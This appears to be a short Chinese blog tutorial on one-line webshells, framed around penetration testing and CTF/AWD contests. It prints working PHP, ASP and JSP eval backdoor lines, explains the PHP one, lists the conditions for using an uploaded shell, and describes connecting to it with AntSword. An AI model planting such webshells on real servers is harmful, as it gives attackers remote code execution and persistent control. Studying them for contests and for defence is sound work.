一句话木马原理及利用

vFREE
2021-03-28 / 1 评论 / 327 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2021年12月08日,已超过291天没有更新,若内容或图片失效,请留言反馈。
故事的开头总是这样,适逢其会,猝不及防。故事的结局总是这样,花开两朵,天各一方。

                                                                                                              --每日网抑云





 何谓一句话木马

在渗透测试或者awd中,一句话木马都发挥着可大可小的作用,大到可能有些管理员会用一句话木马配合蚁剑来管理网站,当然,这种一句话木马肯定不是普通的一句话木马,小到在awd或者ctf比赛中用来维持权限,在比赛中如果挖掘到漏洞,自己修复好之后,反手利用一波,当然也不能保证利用过一次之后可以一直利用,如果被修复了,那这分数就拿不持久了,所以再利用漏洞的同时,也要尽快传一个木马维持权限,无论是PHP,ASP,JSP



常见后缀名的木马

PHP:<?php @eval($_POST['passwd']);?>
ASP:<%eval request ('passwd')%>
JSP:<%@ Page Language="Jscript"%><%eval(Request.Item["passwd"],"unsafe");%>



利用木马的条件

1.上传的木马成功上传,未被查杀
2.知道上传的文件路径以及文件名
3.上传的木马最终可以正常运行    



基础原理

<?php @eval($_POST['passwd']);?>

@:隐藏错误信息,可有可无,但是最好有
eval:将传入的字符作为php代码执行
$_POST:POST的方式传入数据
passwd:连接密码




连接

当木马上传成功后,路径一般会回显出来,比如说../upload/xxx.php
如果给出了路径和文件名+路径
那就好办了,上一句话木马或者蚁剑,URL就是URL/upload/xxx.php
填完密码之后,就可以连接了,nice!!!




但是现在想传马也不是百分百一传一个准的,也要配合多种绕过方式啥的


0

评论 (1)

取消
  1. 头像
    whisper
    Windows 7 · Google Chrome

    还要VIP?

    回复